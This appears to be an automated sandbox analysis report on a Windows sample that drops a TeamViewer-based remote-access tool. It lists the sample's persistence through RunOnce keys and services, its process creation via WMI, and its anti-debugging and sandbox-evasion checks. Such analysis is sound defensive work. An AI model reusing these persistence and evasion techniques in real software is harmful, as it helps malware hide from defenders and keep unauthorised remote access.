Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	3_2_6EAF5B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004C6E36 AdjustTokenPrivileges,	6_2_004C6E36
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	6_2_6EAF5B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	8_2_6EAF5B40

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

File created: C:\Users\user\AppData\Roaming\TeamViewer

Jump to behavior

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

File created: C:\Users\user\AppData\Local\Temp\nsa6984.tmp

Jump to behavior

Source: classification engine

Classification label: mal80.evad.winEXE@22/12@4/4

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

3_2_6EAF29D0

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,	3_2_6EAF3C60
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,	6_2_6EAF3C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,	8_2_6EAF3C60

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Code function: 1_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,753CA680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_00404356

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

3_2_6EAF96D0

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

3_2_6EAF3C60

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Mutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAAPEAAAAA
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4012:120:WilError_01
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF4E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,

3_2_6EAF4E50

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

File created: C:\Program Files (x86)\QS

Jump to behavior

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

File written: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini

Jump to behavior

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 77Etc0bR2v.exe

Static file information: File size 1828192 > 1048576

Source: 77Etc0bR2v.exe

Static PE information: certificate valid

Source:	Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source:	Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source:	Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.268193262.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.536045317.000000006EAFD000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.514763598.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.341816195.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.362277725.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345987825.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000002.367975860.000000006EAFD000.00000002.00020000.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFC101 push ecx; ret	3_2_6EAFC114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0075C004 push ebp; retf	6_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0053E60D push ecx; ret	6_2_0053E620
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0053BD8D push ecx; ret	6_2_0053BDA0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0075BFE4 push ebp; retf	6_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFC101 push ecx; ret	6_2_6EAFC114
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFC101 push ecx; ret	8_2_6EAFC114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026C1E67 push edx; iretd	18_2_026C1E69
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026C062B push edi; retf 0019h	18_2_026C062C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026C181B push ebp; retf 006Bh	18_2_026C181C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026CA91B push edx; retn 0064h	18_2_026CA924
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026C1AF3 push esp; retf 0078h	18_2_026C1AF4
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026C12D7 push ebp; retf 0054h	18_2_026C1314
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026C15B2 push ebp; ret	18_2_026C15E9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026E3A8E push eax; retf	19_3_026E3A99
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026AD4F0 push esp; ret	19_3_026AD4F8
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026AD070 push eax; ret	19_3_026AD077
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026AFB5E push ecx; retf	19_3_026AFB5F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026AF306 push eax; ret	19_3_026AF31F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026B2686 push ecx; retf	19_3_026B2687
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026CC376 push ecx; retf	19_3_026CC377
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026CCC32 push ecx; ret	19_3_026CCC33
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026C9888 push eax; ret	19_3_026C988F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026C9D08 push esp; ret	19_3_026C9D10
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 20_3_02813210 push eax; retf	20_3_02813211
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 20_3_027DFBC7 push es; retf	20_3_027DFBCA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 20_3_027B6650 push cs; retf	20_3_027B6652
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 20_3_027B6A3C push es; ret	20_3_027B6A3E
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 20_3_027B7732 push esi; iretd	20_3_027B7752
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 20_3_027B770F push ss; ret	20_3_027B7712

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Code function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

1_2_00405E88

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create

Drops PE files

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	File created: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll	Jump to dropped file
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	File created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	File created: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF44D0 FrostCrashedWindow,InvertRect,FrostCrashedWindow,InvertRect,GetPrivateProfileIntA,InvertRect,InvertRect,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,InvertRect,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,InvertRect,InvertRect,FrostCrashedWindow,InvertRect,FrostCrashedWindow,InvertRect,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,	3_2_6EAF44D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,	6_2_004E177C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF44D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,	6_2_6EAF44D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF44D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,	8_2_6EAF44D0

Boot Survival:

Creates or modifies windows services

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters

Jump to behavior

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF37D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,

3_2_6EAF37D0

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004FB7F9	6_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004DC9D6	6_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_00500C6A	6_2_00500C6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004FFF68	6_2_004FFF68

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\svchost.exe TID: 4668	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 3100	Thread sleep count: 99 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 3100	Thread sleep time: -49500s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,

3_2_6EAFB0A0

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 6_2_004FFF68

6_2_004FFF68

Contains functionality to query network adapater information

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,		6_2_004B9A29
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: GetAdaptersInfo,		6_2_6EAF82F0

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_00405E61 FindFirstFileA,FindClose,	1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_0040263E FindFirstFileA,	1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,	3_2_6EAF28B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,	3_2_6EAF2DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,	6_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,	6_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,	6_2_6EAF2DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,	6_2_6EAF28B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,	8_2_6EAF28B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,	8_2_6EAF2DF0

Source: svchost.exe, 00000005.00000002.524751408.000002B018262000.00000004.00000001.sdmp	Binary or memory string: $@Hyper-V RAW
Source: svchost.exe, 00000005.00000002.510529267.000002B012C29000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.281567558.0000000000BB8000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.509723909.000001E20B602000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000009.00000002.510137559.000001E20B640000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.510416688.0000024BA4E29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Open window title or class name: ollydbg

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	System information queried: CodeIntegrityInformation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 6_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

6_2_0053496B

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,

3_2_6EAFB0A0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Code function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

1_2_00405E88

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF2000 GetSecurityInfo,GetNamedSecurityInfoA,GetProcessHeap,HeapAlloc,CreateWellKnownSid,SetEntriesInAclA,SetSecurityInfo,SetNamedSecurityInfoA,GetProcessHeap,HeapFree,

3_2_6EAF2000

